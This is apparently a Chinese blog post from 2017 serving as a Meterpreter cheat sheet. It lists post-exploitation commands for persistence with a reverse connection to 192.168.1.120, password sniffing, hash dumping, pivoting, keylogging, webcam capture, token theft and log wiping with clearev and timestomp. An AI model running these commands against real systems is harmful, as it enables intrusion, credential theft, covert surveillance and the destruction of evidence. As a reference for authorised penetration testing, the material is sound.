meterpreter命令

[ meterpreter详解与渗透实战 ](http://blog.csdn.net/freestyle4568world/article/details/54712901)

基本命令:
background
quit
shell
irb
client.sys.config.sysinfo()
调用windows API:client.core.use("railgun")
弹出会话窗口:client.railgun.user32.MessageBoxA(0,"hello!world",NULL,MB_OK)
防止休眠:client.railgun.kernel32.SetThreadExcutionState("ES_CONTINUOUSE | ES_STSTEM_REQUIRED")

cat c:\boot.ini
目标当前目录:getwd
本地当前目录:getlwd
edit
upload
download
search
portfwd 端口转发
ipconfig
route
ps
migrate 将回话一直到另一个进程中
execute
getpid
kill
getuid
sysinfo
shutdown

后渗透攻击:
persistence模块:
run persistence -X -i 5 -p 443 -r 192.168.1.120
-X开机启动
-i反向链接间隔时间
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set ...
exploit

metsvc模块:
run metsvc

getgui模块:
run getdui -u metasploit -p metasploit

use sniffer 嗅探密码
sniffer_interface
sniffer_start 1
sniffer_dump 1 /tmp/xxx.cap
sniffer_stop 1

run windows/gather/smart_hashdump
hashdump

内网拓展:
run get_local_subnets
background

route print

销毁证据:
clearev 删除日志
timestomp 文件修改时间


Core Commands

Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
help                      Help menu
info                      Displays information about a Post module
irb                       Drop into irb scripting mode
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
migrate                   Migrate the server to another process
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
sessions                  Quickly switch to another session
set_timeouts              Set the current session timeout values
sleep                     Force Meterpreter to go quiet, then re-establish session.
transport                 Change the current transport mechanism
use                       Deprecated alias for 'load'
uuid                      Get the UUID for the current session
write                     Writes data to a channel

Stdapi: File system Commands

Command       Description
-------       -----------
cat           Read the contents of a file to the screen
cd            Change directory
checksum      Retrieve the checksum of a file
cp            Copy source to destination
dir           List files (alias for ls)
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
mv            Move source to destination
pwd           Print working directory
rm            Delete the specified file
rmdir         Remove directory
search        Search for files
show_mount    List all mount points/logical drives
upload        Upload a file or directory

Stdapi: Networking Commands

Command       Description
-------       -----------
arp           Display the host ARP cache
getproxy      Display the current proxy configuration
ifconfig      Display interfaces
ipconfig      Display interfaces
netstat       Display the network connections
portfwd       Forward a local port to a remote service
resolve       Resolve a set of host names on the target
route         View and modify the routing table

Stdapi: System Commands

Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getenv        Get one or more environment variable values
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process
getsid        Get the SID of the user that the server is running as
getuid        Get the user that the server is running as
kill          Terminate a process
localtime     Displays the target system's local date and time
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
suspend       Suspends or resumes a list of processes
sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

Command        Description
-------        -----------
enumdesktops   List all accessible desktops and window stations
getdesktop     Get the current meterpreter desktop
idletime       Returns the number of seconds the remote user has been idle
keyscan_dump   Dump the keystroke buffer
keyscan_start  Start capturing keystrokes
keyscan_stop   Stop capturing keystrokes
screenshot     Grab a screenshot of the interactive desktop
setdesktop     Change the meterpreters current desktop
uictl          Control some of the user interface components

Stdapi: Webcam Commands

Command        Description
-------        -----------
record_mic     Record audio from the default microphone for X seconds
webcam_chat    Start a video chat
webcam_list    List webcams
webcam_snap    Take a snapshot from the specified webcam
webcam_stream  Play a video stream from the specified webcam

Priv: Elevate Commands

Command       Description
-------       -----------
getsystem     Attempt to elevate your privilege to that of local system.

Priv: Password database Commands

Command       Description
-------       -----------
hashdump      Dumps the contents of the SAM database

Priv: Timestomp Commands

Command       Description
-------       -----------
timestomp     Manipulate file MACE attributes

Incognito Commands

Command              Description
-------              -----------
add_group_user       Attempt to add a user to a global group with all tokens
add_localgroup_user  Attempt to add a user to a local group with all tokens
add_user             Attempt to add a user with all tokens
impersonate_token    Impersonate specified token
list_tokens          List tokens available under current user context
snarf_hashes         Snarf challenge/response hashes for every token
posted @ 2017-02-13 19:29  itholiday  阅读(821)  评论(0编辑  收藏  举报